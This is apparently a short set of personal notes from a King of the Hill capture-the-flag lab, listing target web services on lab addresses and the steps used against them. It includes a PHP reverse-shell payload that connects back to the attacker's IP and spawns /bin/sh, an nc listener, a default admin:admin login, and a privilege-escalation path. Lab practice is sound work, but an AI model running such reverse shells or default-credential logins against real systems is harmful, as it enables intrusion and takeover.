KoTH H1 easy
target ip: 10.10.109.211 my local ip: 10.11.12.13
Targets
| server | port | service | version | vulnerable | link |
|---|---|---|---|---|---|
| 1 | 8000 | apache httpd | 2.4.29 | x | http://10.10.109.211:8000/vbcms/login |
| 2 | 8001 | apache httpd | 2.4.29 | x | http://10.10.109.211:8001 |
| 3 | 8002 | apache httpd | 2.4.29 | x | http://10.10.109.211:8002/lesson/1 |
| 4 | 80 | http://10.10.109.211:80/topSecretPrivescMethod |
Server 3
Reverse Shell
Spawn remote shell by using remote code execution.
$sock = fsockopen("10.11.12.13",4444);
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);Listen reverse shell
nc -lvnp 4444Privilege escalation
Server 1
robots.txt -> /vbcms/login login
with credentials admin:admin.
Server 4
path: /topSecretPrivescMethod